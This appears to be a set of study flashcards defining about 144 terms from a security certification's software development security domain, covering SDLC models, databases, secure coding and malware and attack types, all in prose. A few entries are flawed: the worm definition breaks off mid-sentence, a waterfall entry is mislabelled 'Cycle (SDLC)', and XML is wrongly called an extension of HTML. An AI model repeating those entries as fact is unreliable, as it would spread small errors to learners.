Domain 8: Software Development Security

Question 1

Acceptance

Answer 1

A formal, structured handover of the finished software system to the customer organization; typically involves test, analysis, and assessment activities.

Question 2

Accreditation (also Security Accreditation)

Answer 2

Formal declaration by a designated accrediting authority (DAA) that an information system is approved to operate at an acceptable level of risk, based on the implementation of an approved set of technical, managerial, and procedural safeguards.

Question 3

ACID Test

Answer 3

Data integrity provided by means of enforcing atomicity, consistency, isolation, and durability policies.

A.c.i.d tests integrity

Question 4

Advanced Persistent Threats (APTs)

Answer 4

An agent or organization of agents that plans, organizes, and carries out a highly sophisticated attack against a target person, organization, or industry over a period of months or possibly even years (thus “persistent”). APTs usually have a strategic goal in mind, which requires many steps in a concerted attack plan to achieve. The term “APT” may refer to the organization conducting the attack, to specific steps in such an attack as observed by a target, or to the entire attack sequence. An APT usually involves a phased set of activities, each of which may use dozens of different attack vectors in sequence or in tandem.

Question 5

Aggregation

Answer 5

The ability to combine nonsensitive data from separate sources to create sensitive information.

Question 6

Blocked and Allowed Lists (software, identities, addresses)

Answer 6

Use of lists of blocked or allowed identities—whether as users, URLs, URIs, web addresses, IP addresses, geographic regions, hardware addresses, files, or program—as a means of controlling (prohibiting or permitting) their access, use, or attempt to load and execute. These systems also alert designated IT security personnel if the attempt involves a resource not on a pre-approved list. Stand-alone security tools and integrated systems that provide these capabilities are now starting to incorporate anti-malware processesas part of their offerings; similarly, anti-malware products have begun to incorporate these blocked/allowed list management and use capabilities. In this course, the term “blocked list” replaces “blacklist” and the term “allowed list” replaces “whitelist.”

Question 7

Botnets

Answer 7

A network of automated systems or processes (robots, or for short, bots) performing a specific function together, usually malicious. Botnets have greatly magnified the power and speed of malicious operations because they all work together toward achieving a malicious goal, and they have allowed for tuning and directing of operations in a way that was not possible with malicious programs in the past.

Question 8

Bots

Answer 8

An emerging and special class of mobile code. These employ limited machine learning capabilities to assist with user requests for help or assistance, automation of or assistance with workflows, data input quality validation, and other similar tasks.

Question 9

Buffer Overflow

Answer 9

A source code vulnerability that allows attempts to access data locations outside of the storage space to be allocated to the buffer. It can be triggered by attempting to input data that is larger than the input buffer being used.

User input is not validated and not appropriate size, it overflows the data structure allowing malicious commands.

Question 10

Bypass Attack

Answer 10

Users may attempt to bypass controls at the front end of the database application to access information.

Question 11

Certification

Answer 11

The comprehensive technical security analysis of the system to ensure that it meets all applicable security requirements.

Question 12

Citizen Programmers

Answer 12

Members of the organization who codify work-related knowledge, insights, and ideas into varying degrees of reusable software-like forms, often using extensibility features found in most commercial software apps. The ad hoc nature of these pieces of functionality is extremely difficult to manage, control, verify, or assess. In almost all cases, these are beyond the reach and visibility of the organization’s software quality, configuration management, or security assessment processes. Such “citizenprogramming” is often done with little regard to security requirements and can pose a significant risk to some organizations.

Question 13

Code Protection or Logic Hiding

Answer 13

Prevents one software unit from reading or altering the source, intermediate, or executable code of another software unit.

Question 14

Code Reuse

Answer 14

When programmers reuse, rather than reinvent, units of software (procedures or objects) that have already been demonstrated to be correct, complete, safe, and secure.

Question 15

Commercial Off-the-Shelf (COTS)

Answer 15

Software elements, usually applications, that are provided as finished products not intended for alteration by the end user. Most COTS applications are available as host- based, endpoint-based, or platform-based services, and support user extensibility by means of non-programming tools, scripts, macros, and configuration parameters. COTS can also include firmware and hardware elements.

Question 16

Common Object Request Broker Architecture (CORBA)

Answer 16

A set of standards that addresses the need for interoperability between hardware and software products residing on different machines across a network. CORBA provides object location and use across a network.

An international standard for
distributed computing. CORBA enables code operating on a computer to locate resources
located elsewhere on the network.

Question 17

Configuration Control (CC)

Answer 17

Process of controlling modifications to hardware, firmware, software, and documentation to protect the information system against improper modifications prior to, during, and after system implementation.

Question 18

Configuration Management (CM)

Answer 18

A collection of activities focused on establishing and maintaining the integrity of information technology products and information systems, through control of processes for initializing, changing, and monitoring the configurations of those products and systems throughout the system development life cycle.

Question 19

Continuous Integration and Continuous Delivery (CI/CD)

Answer 19

Workflow automation processes and tools that attempt to reduce, if not eliminate, the need for manual communication and coordination between thesteps of a software development process.

Question 20

Covert Channel or Covert Path

Answer 20

A communications pathway between two or more processes that transfers information in ways that violate some security policy or requirement. These can be created deliberately (wittingly) by the process designer(s), or unwittingly by the hostile process exploiting hitherto unrecognized exposures of information, resources, or other characteristics by the target system.

Question 21

Data Contamination

Answer 21

Attackers can attempt to use malformed inputs—at the field, record, transaction, or file level—to disrupt the proper functioning of the system.

Question 22

Data Lake

Answer 22

A data warehouse incorporating multiple types or streams of unstructured or semi-structured data.

Question 23

Data Mining

Answer 23

An analysis and decision-making technique that relies on extracting deeper meanings from many different instances and types of data; often applied to data warehouse content.

Gather mining resources to make decision

Question 24

Data Modeling

Answer 24

A design process that identifies all data elements the system will need to input, create, store, modify, output, and destroy during its operational use. Arguably, data modeling should be one of the first steps in systems analysis and design, regardless of whether procedural or OOP approaches will be used to implement it.

Question 25

Data Protection or Data Hiding

Answer 25

Restricts or prevents one software unit from reading or altering the private data of another software unit.

Question 26

Data Type Enforcement

Answer 26

How well (or how poorly) a language protects the programmer from trying to perform operations on dissimilar types of data, or in ways that would lead to erroneous results.

Question 27

Data Warehouse

Answer 27

A collection of data sources such as separate internal databases to provide a broader base of information for analysis, trending, and reference. May also involve databases from outside of the organization, either by importing a copy or by reference.

Question 28

Database Management System (DBMS)

Answer 28

Asuite of application programs that typically manage databases and their environments. The heart of the DBMS is the database engine, a core application that performs and manages the basic functions of create, read, update, and delete (CRUD) of data to and from the database, while also making data available for display or export to users, endpoints, and other systems. The DBMS provides the structure for the data and some type of language and architecture for accessing and manipulating the data. The main objective is to store data and allow users to interact with it, but in a secure way from a confidentiality, integrity, and availability perspective.

Question 29

Database Model

Answer 29

The underlying software design concepts that a DBMS implements; it identifies the specific organization, structure, and architecture that the DBMS can provide to users as they build specific databases to meet business needs.

Question 30

Data-Centric Threat Modeling

Answer 30

A methodology and framework for focusing on the authorized movement, locations, execution, input, and output of data within, from, and into a system. These correspond with the security concepts of protecting data in transit, at rest (or in storage), and in use, and it provides a focus for carrying out the security decisions already made as the organization classifies and categorizes its data.

Question 31

Defensive Programming

Answer 31

The style of program design and coding that translates the business logic about acceptable and harmful input into code, which allows processing of acceptable inputs, but safely blocks attempts to input (or inject) harmful inputs. The lack of adequate defensive programming measures can result in an arbitrary code execution, a misdirection of the program to other resources or locations, or otherwise reveal more information useful to an attacker.

Question 32

DevOps

Answer 32

A systems development approach based on lean and agile principles in which business owners and the development, operations, and quality assurance departments collaborate to deliver software in a continuous manner that enables the business to more quickly react to market opportunities and reduce the time to include customer feedback into products that need to be developed.

Question 33

DevSecOps

Answer 33

Provides for a merger of phased review (as in the waterfall SDLC) with the DevOps method, to incorporate the needs for security, safety, resilience, or other emerging properties in the final system, at each turn of the cycle of development.

Question 34

Dynamic Application Security Testing (DAST)

Answer 34

Tools that execute the software unit, application, or system under test in ways that attempt to drive it to reveal a potentially exploitable vulnerability.

Question 35

Emerging Properties

Answer 35

An alternate and perhaps more powerful way of looking at systems-level behavior characteristics such as safety and security. This perspective also helps provide a more testable, measurable answer to questions such as “How secure is our system?”

Question 36

Encapsulation

Answer 36

Enforcement of data hiding and code hiding during all phases of software development and operational use. Bundling together data and methods is the process of encapsulation; its opposite process may be called unpacking or revealing. Also used to refer to taking any set of data and packaging it or hiding it in another data structure, as is common in network protocols and encryption.

Question 37

Executable Code, Object Code

Answer 37

The binary representation of the machine language instruction set that the CPU and other hardware of the target computer directly execute.

Question 38

Extensible Markup Language (XML)

Answer 38

A set of extensions to HTML that provide for data storage and transport in networked environments. XML is frequently used to interface web pages at the front end of a system (as they are displayed and used on client endpoint devices) with databases on back-end servers. XML is often embedded in the HTML files that make up the elements of web pages.

Question 39

Functional Requirements

Answer 39

Describes a finite task or process the system must perform. These are often directly traceable to specific elements in the final system’s design and construction; formal configuration item audits should, for example, be able to identify a given unit of software with the specific functional requirements that dictated it be written and included into the product build.

Question 40

Hierarchical Database Model

Answer 40

Database model in which data elements and records are arranged in parent-child structures such as trees.

Question 41

Independent Verification and Validation (IV&V)

Answer 41

A comprehensive review, analysis, and test (software or hardware, or both) performed by an objective third party to confirm (i.e., verify) that the requirements are correctly defined, and to confirm (i.e., validate) that the system correctly implements the required functionality and security requirements.

Question 42

Inheritance

Answer 42

Provides mechanisms by which objects that are members of a class (a higher- level grouping of like objects) can make use of specific characteristics of the class. Files in a read-only folder, for example, generally will also inherit the folder’s read-only attribute.

Question 43

Interactive Application Security Testing (IAST)

Answer 43

Testing that combines or integrates SAST and DAST to improve testing and provide behavioral analysis capabilities to pinpoint the source of vulnerabilities.

Question 44

Integrated Development Environments (IDEs)

Answer 44

A set of software applications, their control procedures, supporting databases, libraries, and tool sets that provide a programmer or a team of programmers what they need to specify designs; translate designs into source code; and then compile, test, and integrate that code into a finished software product. Many IDEs support multiple programming languages and facilitate their use on the same project.

Question 45

Integrated Product Team (IPT)

Answer 45

A team of stakeholders and individuals who have various skills and work together to achieve a defined process or product.

Question 46

Intermediate Code

Answer 46

Expressing a program’s required function in a form that is somewhere between human-readable source code and binary sets of values that can be loaded into memory and executed by a CPU. The most common use of intermediate code is to provide machine independence or portability for a program, such as Java does.

Question 47

Knowledge Discovery in Database (KDD)

Answer 47

A mathematical, statistical, and visualization method of identifying valid and useful patterns in data.

Question 48

Knowledge Management

Answer 48

The efficient and effective management of information and associated resources in an enterprise to drive business intelligence and decision-making. It may include workflow management, business process modeling, document management, databases and information systems, and knowledge-based systems.

Question 49

Level of Abstraction

Answer 49

How close the description (in source code, design documents, or any other form) represents one-to-one the details of the underlying object, system, or component. Lower- level abstractions generally have far more fine- grain detail than higher level ones.

Question 50

Living Off the Land Nonmalware-Based Ransom Attack

Answer 50

An attack on a system in which illicit access to a system is used to misuse systems capabilities in the pursuit of the attacker’s agenda. The attacker does not use malware in such attacks, hence, anti-malware defenses will not detect and prevent it.

Question 51

Logic Bombs

Answer 51

Malware inserted into a program that will activate and perform functions that suit an attacker’s needs at some later date or when certain conditions are met.

Question 52

Malformed Input Attack

Answer 52

Many of the common source code errors in software can lead to that software failing to correctly handle input data, singly or in combination, that exceeds logical range checks, is contradictory or inconsistent, or is unauthorized. This can result in an arbitrary code execution, a misdirection of the program to other resources or locations, or otherwise reveal additional information useful to an attacker.

Question 53

Malware

Answer 53

A program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim’s data, applications, or operating system or of otherwise annoying or disrupting the victim.

Question 54

Markup Languages

Answer 54

Nonprogramming languages used to express formatting or arrangement of data on a page or screen. Markup languages are extensible, which allows users to define other operations to be performed. These extend the language into a programming language, such as the way that JavaScript extends HTML.

Question 55

Memory or Object Reuse

Answer 55

All systems must allocate memory or other resources as objects to requesting processes, which involves one process reusing such resources after the first using process has finished with them. Any data remaining in the object when it is reused is a potential security violation (i.e., a data remanence issue).

Question 56

Metadata

Answer 56

Information that describes the format or meaning of other data, which can be used to provide a systematic method for describing resources and improving the retrieval of information.

Question 57

Mobile Code (Executable Content)

Answer 57

A file or a set of files sent by one system to one or more other target or client systems, which, when opened by software already installed on that client, will either control the execution of systems and applications software on that client or be directly executed by that client’s CPU.

Question 58

Modified Prototype Model (MPM)

Answer 58

An approach to designing and building a system that starts by building a simplified version of the entire application; this is released for review, with the feedback from the stakeholders used to improve the design of a second, much better version. This is repeated until the owner and stakeholders are satisfied with the final product.

Question 59

Network Database Model

Answer 59

Database model in which data elements and records are arranged in arbitrary linked fashion, such as lists, clusters, or other network forms.

Question 60

Nonfunctional Requirements

Answer 60

Identifies broad characteristics of the system as a whole. These usually do not align with a clearly identified subset of systems elements. Typically, many safety, security, privacy, and resiliency needs have been deemed nonfunctional by their systems’ analysts and engineers, and, as such, configuration audits cannot identify whether any given software unit contributes to such nonfunctional requirements, or indeed if any of them do.

Question 61

Object

Answer 61

An encapsulation of a set of data and the methods that can be used to manipulate that data.

Question 62

Object-Oriented (OO) Database Model

Answer 62

A database model that uses object-oriented programming concepts of classes, instances, and objects to organize, structure, and store both data and methods. Schemas define the structure of the data (in terms of tables, records, and attributes or fields); views establish specific selections of tables, rows, and columns to meet user or security needs.

Question 63

Object-Oriented Programming (OOP)

Answer 63

Defines an object to be a set of software that offers one or more methods, internal to the object, that software external to that object can request be performed. Each method may require specific inputs and resources and may produce a specified set of outputs.

Question 64

Open-Source Software

Answer 64

Software whose source code and other design information is made publicly available for inspection, testing, assessment, and use. In many cases, open-source licenses allow modification and refactoring. While many commercial software products protect their source code as proprietary, others include or are licensed, supported reuse of open-source software.

Question 65

Polyinstantiation

Answer 65

Creates a new instance (or version copy) of a data item, with the same identifier or key, allowing for each process to have its own version of that data. Useful for enforcing and protecting different security levels for a shared resource.

Question 66

Polymorphism

Answer 66

Allowing an object to “take many forms” based on how it is used means that changes to an object do not have to ripple out into every application’s program that uses that object.

Question 67

Procedural Programming

Answer 67

Emphasizes the logical sequence or flow of steps to be performed. A “procedure” is a set of software that performs a particular function, requires specific input data (and possibly other resources), and produces a specific set of outputs. Outputs may include error signals, when appropriate. Procedures can invoke (“call”) other procedures.

Question 68

Query Attack

Answer 68

Use of query tools to access data not normally allowed by the trusted front end, including the views controlled by the query application. Malformed queries using SQL to bypass security controls may be possible as well. There are many other examples of where improper or incomplete checks on queries

Question 69

Ransom Attack

Answer 69

Any form of attack that threatens the destruction, denial, or unauthorized public release or remarketing of private information assets. It usually involves encrypting these assets and withholding the decryption key until the ransom is paid by the victim.

Question 70

Ransomware

Answer 70

Malware used for the purpose of facilitating a ransom attack.

Question 71

Rapid Application Development (RAD)

Answer 71

A development methodology that creates an application more quickly by employing techniques such as the use of fewer formal methodologies and reuse of software components.

Question 72

Refactoring

Answer 72

A partial or complete rewrite of a set of software to perform the same functions, but in a more straightforward, more efficient, or more maintainable form.

Question 73

Regression Testing

Answer 73

Testing of a system to ascertain whether recently approved modifications have changed its performance of other approved functions or has introduced other unauthorized behaviors.

Question 74

Relational Database Model

Answer 74

Database model in which data elements and records arrangedin tables, and tables are related (linked) to each other to implement a business logic needed to use data records of different structures or types together in the same activity.

Question 75

Representational State Transfer (REST)

Answer 75

A software architectural style for synchronizing the activities of two (or more) applications running on different systems on a network. REST facilitates these processes exchanging state information, usually via HTTP or HTTPS.

Question 76

Runtime Application Security Protection (RASP)

Answer 76

Security agents (small code units) built into an application by the developer that can detect a given set of security violations; upon such detection, the RASP agents can cause the application to terminate, or take other protective actions.

Question 77

Sandbox

Answer 77

A testing environment that is logically, physically, or virtually isolated from other environments, and in which applications or systems can be evaluated. Sandboxes can be used as part of development, integration, or acceptance testing to not interact with the production environments, as part of malware screening, or as part of a honeynet.

Question 78

Scanners (Anti-malware)

Answer 78

Software that examines a suspected file or set of files for the presence of malware, by signature analysis, activity monitors, heuristics, and machine learning techniques or change analysis.

Question 79

Secure Coding Guidelines and Standards

Answer 79

Best practices identified by a variety of software and security professionals that, when used correctly, can dramatically reduce the number of exploitable vulnerabilities introduced during development that remain in the operationally deployed system.

Question 80

Security Assessment

Answer 80

Testing, inspection, and analysis to determine the degree to which a system meets or exceeds the required security posture. This may assess whether an as-built system meets the requirements in its specifications, or whether an in-use system meets the current perception of the real-world security threats the system may be facing.

Question 81

Software (Quality) Assurance

Answer 81

A variety of formal and informal processes that attempt to determine whether a software application or system meets all. its intended functions, does not perform unwanted functions, is free from known security vulnerabilities, and is free from insertion of other errors in its design, code, form, function, and data.

Question 82

Software Capability Maturity Modeling (SW-CMM) and Assessment

Answer 82

A management process to foster the ongoing and continuous improvement of an organization’s processes and workflows for developing, maintaining, and using software.

Question 83

Software Development Life Cycle (SDLC)

Answer 83

A framework and a systematic process with associated tasks that are performed in a series of steps for building, deploying, and supporting software applications. The life cycle begins with planning and requirements gathering and ends with decommissioning and sunsetting the software. There are many different SDLCs—such as agile, DevSecOps, and rapid prototyping— offering different approaches to defining and managing the software life cycle.

Question 84

Software Libraries

Answer 84

A repository of prewritten code, classes, procedures, scripts, and other programming elements. These may be provided by systems or applications vendors, from trustworthy third-party developers, developed in-house by the organization’s programmers, or available from various open-source sites.

Question 85

Source Code

Answer 85

Program statements written in human-readable form using a formal programming language’s rules for syntax and semantics.

Question 86

Spiral Method

Answer 86

Improved waterfall development process, which provides for a cycle of Plan, Do, Check, and Act (PDCA) substages at each phase of the SDLC.

Question 87

Spyware and Adware

Answer 87

Software that performs a variety of monitoring and data gathering functions. Also known as potentially unwanted programs or applications (PUPs or PUAs), these may be used in monitoring employee activities or their use of systems resources (spyware); adware facilitates advertising efforts. Both may be legitimate and authorized by systems owners to be in use or may be unwanted intruders in these systems.

Question 88

Static Application Security Testing (SAST)

Answer 88

Also known as static source code analysis, these are tools that examine the source code for a variety of errors such as data type errors, loop and structure bounds violations, and unreachable code. Since SAST tools do not attempt to execute or simulate the execution of the code being analyzed, it is a bit of a misnomer to call them “testing” tools.

Question 89

Strong Data Typing

Answer 89

A feature of a programming language that prevents data type mismatch errors (such as trying to add amounts of money to dates or times). Strongly typed languages will generate errors at compile time, forcing the programmer to correct a type mismatch or include additional code that performs the correct data type conversion at runtime.

Question 90

Threat Surface

Answer 90

The total set of penetrations of a boundary or perimeter that surrounds or contains systems elements.

Question 91

Time of Check versus Time of Use (TOCTOU) Attacks

Answer 91

Takes advantage of the time delay between a security check (such as authentication or authorization) being performed and actual use of the asset.

Question 92

Trapdoor or Backdoor

Answer 92

A hidden mechanism that bypasses access control measures. It is an entry point into an architecture or system that is inserted in software by developers, during the program’s development, to provide a method of gaining access into the program for modification and support reasons. It can also be inserted by an attacker, bypassing access control measures designed to prevent unauthorized software changes.

Question 93

Trojans

Answer 93

Malware that inserts backdoors or trapdoors into other programs or systems. The malware may or may not be disguised as some useful or entertaining application.

Question 94

Trusted Computing Base (TCB)

Answer 94

The collection of all the hardware, software, and firmware components within an architecture that is specifically responsible for security and the isolation of objects. TCB is a term usually associated with security kernels and referencemonitor.

Question 95

View-Based Access Controls

Answer 95

An access control process that allows the database to be logically divided into pieces (individual records, fields, or groups of items) that allow certain sensitive data to be hidden from users that are not authorized to see it or manipulate it. Administrators can set up a view for each type of user and then each user can only access the view assigned to them. Some database views will allow the restrictions to be granular—for example, of both rows and columns—while others allow for views that can write and update data as well as the capability to only read.

Question 96

Virus

Answer 96

A software program written with the intent and capability to copy and disperse itself without the knowledge and cooperation of the owner or user of the system. Researchers of malicious software disagree on a perfect definition of a virus; however, a common definition may be a program that modifies other programs to contain a possibly altered version of itself.

Question 97

Cycle (SDLC)

Answer 97

Traditional or classic software development life cycle model with clearly defined boundaries between each phase. There are many variations on this model, with phases such as concept or mission; needs identification; requirements definition; systems design; software and data systems coding; unit, subsystem, and systems testing; acceptance testing; and deployment to operational use. There are many other SDLCs as models and business processes, all different, which are not “waterfall” in concept or use.

Question 98

Worm

Answer 98

A software program written with the intent and capability to copy and disperse itself without the knowledge and cooperation of

Question 99

runtime environment

Answer 99

A system that allows the portable execution of code across different
operating systems. This may include sandboxes, virtual machines, and containerization.

Question 100

compiler

Answer 100

A software development tool that converts higher-level language code into a
machine language executable file designed for use on a specific operating system.

Question 101

decompiler

Answer 101

A specialized programming tool that may be able reverse the compilation process. Decompilers attempt to take binary executables and convert them back into source code
form. See disassembler

Question 102

software library, Software libraries

Answer 102

A collection of reusable code for developers. These
libraries perform a variety of functions, ranging from text manipulation to machine learning,
and are a common way for developers to improve their efficiency.

Question 103

input validation

Answer 103

An aspect of defensive programming intended to ward off a wide range
of input-focused attacks, such as buffer overflows and fuzzing. Checking, scanning, filtering,
or sanitizing input received from users (especially over the internet) before processing the
received input. See also input sanitization.

Question 104

limit check

Answer 104

A type of input validation, where the code checks to ensure that a number falls
within an acceptable range.

Question 105

Capability Maturity Model (CMM)

Answer 105

A formal software development management concept
that describes the process that organizations undertake as they move toward incorporating
solid engineering principles into their software development processes. Aka software capability maturity model (SCMM, S-CMM).

Question 106

Software Assurance Maturity Model (SAMM)

Answer 106

An open source project maintained by the
Open Web Application Security Project (OWASP). It seeks to provide a framework for integrating security activities into the software development and maintenance process as well as
offer organizations the ability to assess their maturity

Question 107

reasonableness check

Answer 107

The crafting and use of special test suites of data that exercise
all paths of the software to the fullest extent possible and comparison of the results to the
known correct expected outputs.

Question 108

candidate key

Answer 108

A subset of attributes, columns, or fields that can be used to uniquely identify any record in a table. Aka alternate key.

Question 109

foreign key

Answer 109

A primary key from another table used to cross-link or express relationships
between the contents of two tables.

Question 110

normalization

Answer 110

The database process that removes redundant data and ensures that all
attributes are dependent on the primary key.

Question 111

polyinstantiation

Answer 111

The event that occurs when two or more rows in the same table
appear to have identical primary key elements but contain different data for use at differing
classification levels. Polyinstantiation is often used as a defense against some types of inference attacks.

Question 112

primary key

Answer 112

A specific key from the set of candidate keys that is used as the main differentiator between records. Every record must have a unique value in its primary key field.

Question 113

referential integrity

Answer 113

Used to enforce relationships between two tables. One table in the
relationship contains a foreign key that corresponds to the primary key of the other table in
the relationship.

Question 114

tuple

Answer 114

(1) A record or row in a database. (2) A collection of related data items.

Question 115

cardinality

Answer 115

The number of rows in a relational database.

Question 116

degree

Answer 116

The number of columns in a relational database.

Question 117

database contamination

Answer 117

What happens when data or records of different values,
classifications, security domains, and the like are commingled or mixed together. It can be a
form of integrity and confidentiality violation.

Question 118

multipart virus, multipartite virus

Answer 118

Malware that performs multiple tasks and may infect
a system in numerous ways

Question 119

stealth virus

Answer 119

Malicious code that attempts to avoid detection by masking or hiding its
activities.

Question 120

polymorphic

Answer 120

An attribute of some malware that allows the malware to mutate and appear
differently each time it crops up. It is malware that modifies its own code as it travels from
system to system. The mutations make it harder for malware scanners to detect (and react
to) the unwanted code, since the signature of the malware is somewhat different each time it
infects a new system. Aka polymorphic virus or polymorphic malware.

Question 121

encrypted virus

Answer 121

A virus that uses cryptographic techniques to avoid detection. In their outward appearance, they are quite similar to polymorphic viruses—each infected system has a
virus with a different signature. However, they do not generate these modified signatures by
changing their code; instead, they alter the way they are stored on the disk.

Question 122

Trojan (previously Trojan horse)

Answer 122

Any application that masquerades as something
benign to get past scrutiny and then does something malicious. A malicious code object
that appears to be a benevolent program, such as a game or simple utility that performs the
“cover” functions as advertised but also carries an unknown payload, such as a virus. One
of the major differences between Trojans and viruses is that Trojans tend not to replicate
themselves.

Question 123

worm

Answer 123

A form of malicious code that is self-replicating but is not designed to impose direct
harm on host systems. The primary purpose of a worm is to replicate itself to other systems
and gather information. Worms are usually very prolific and often cause a denial of service
because of their consumption of system resources and network bandwidth in their attempt to
self-replicate.

Question 124

endpoint detection and response (EDR)

Answer 124

A security mechanism that is an evolution of
traditional antimalware products. EDR seeks to detect, record, evaluate, and respond to suspicious activities and events, which may be caused by problematic software or by valid and
invalid users

Question 125

user and entity behavior analysis (UEBA), user and entity behavior analytics

Answer 125

The E in
UEBA extends the UBA concept to include entity activities that take place but that are not
necessarily directly linked or tied to a user’s specific actions, but that can still correlate to a
vulnerability, reconnaissance, intrusion, breach, or exploit occurrence. Information collected
from UBA/UEBA monitoring can be used to improve personnel security policies, procedures,
training, and related security oversight programs

Question 126

time of check (TOC)

Answer 126

The time at which a subject checks on the status of an object.

Question 127

time of check to time of use (TOCTOU, TOC2TOC, TOCTTOU, TOC/TOU)

Answer 127

A timing vulnerability that occurs when a program checks access permissions too far in advance of a
resource request. A type of exploitation in which attackers abuse the predictability and precision of task execution to cause a loophole in security filtering or authentication. See also race
conditions.

Question 128

rootkit

Answer 128

A special type of hacker tool that embeds itself deep within an operating system
(OS). The rootkit positions itself at the heart of an OS where it can manipulate information
seen by the OS and its users.

Question 129

injection attack

Answer 129

Any exploitation that allows an attacker to submit code to a target system
to modify its operations and/or poison and corrupt its dataset. See SQL injection, LDAP
injection, DLL injection, HTML injection, and XML injection. Aka injection vulnerabilities

Question 130

blind SQL injection

Answer 130

A means to conduct a SQL injection attack even when there is no
ability to view the results directly.

Question 131

DLL injection

Answer 131

An advanced software exploitation technique that manipulates a process’s
memory to trick it into loading additional code and thus perform operations the original
author did not intend. A dynamic-link library (DLL) is a collection of code that is designed to
be loaded and used as needed by a process. Aka DLL hijacking or DLL injection attack.

Question 132

insecure direct object reference

Answer 132

If an application does not perform authorization checks, the
user may be permitted to view information that exceeds their authority when directly accessed.

Question 133

directory traversal

Answer 133

An attack that enables an attacker to jump out of the web root
directory structure and into any other part of the filesystem hosted by the web server’s host
operating system.

Question 134

file inclusion attack

Answer 134

A web-focused attack that builds on directory traversal. Instead of
simply retrieving a file from the local operating system and displaying it to the attacker, file
inclusion attacks actually execute the code contained within a file, allowing the attacker to
fool the web server into executing targeted code. Variants include local file inclusion and
remote file inclusion.

Question 135

cross-site request forgery (XSRF, CSRF)

Answer 135

An attack that is similar in nature to cross-site
scripting (XSS). However, with XSRF, the attack is focused on the visiting user’s web browser
more than the website being visited. The main purpose of XSRF is to trick the user or the
user’s browser into performing actions they did not intend or would not have authorized
against a targeted server, system, or site. Aka client-side request forgery (CSRF).

Question 136

request forgery

Answer 136

Attacks that exploit trust relationships and attempt to have users unwittingly execute commands against a remote server. They come in two forms: cross-site request
forgery and server-side request forgery.

Question 137

server-side request forgery (SSRF)

Answer 137

A clever exploit where a vulnerable server is coerced
into functioning as a proxy.

Question 138

input whitelisting

Answer 138

The most effective form of input validation in which the developer describes
the exact type of input that is expected from the user and then verifies that the input matches that
specification before passing the input to other processes or servers. Aka input allow listing.

Question 139

input blacklisting

Answer 139

A means to control user input. With this approach, developers do not
try to explicitly describe acceptable input but instead describe potentially malicious input
that must be blocked. Aka input block listing.

Question 140

data minimization

Answer 140

The reduction of data collected or stored to the minimum necessary to
perform essential business tasks.

Question 141

resource exhaustion

Answer 141

When applications are allowed to operate in an unrestricted and
unmonitored manner so that all available system resources are consumed in the attempt to
serve the requests of valid users or in response to a denial-of-service (DoS) attack.

Question 142

memory leak

Answer 142

What occurs when a program fails to release memory or continues to consume more memory. It’s called a leak because the overall computer system ends up with less
available free memory when an application is causing a memory leak.

Question 143

memory pointer

Answer 143

A commonly used concept in application development. Memory
pointers are simply an area of memory that stores an address of another location in memory.
See pointer

Question 144

pointer dereference

Answer 144

The programmatic activity of retrieving the value stored in a memory
location by triggering the pulling of the memory based on its address or location as stored in
a pointer (a type of variable that holds an address—that is, a memory space location). Aka
object dereference.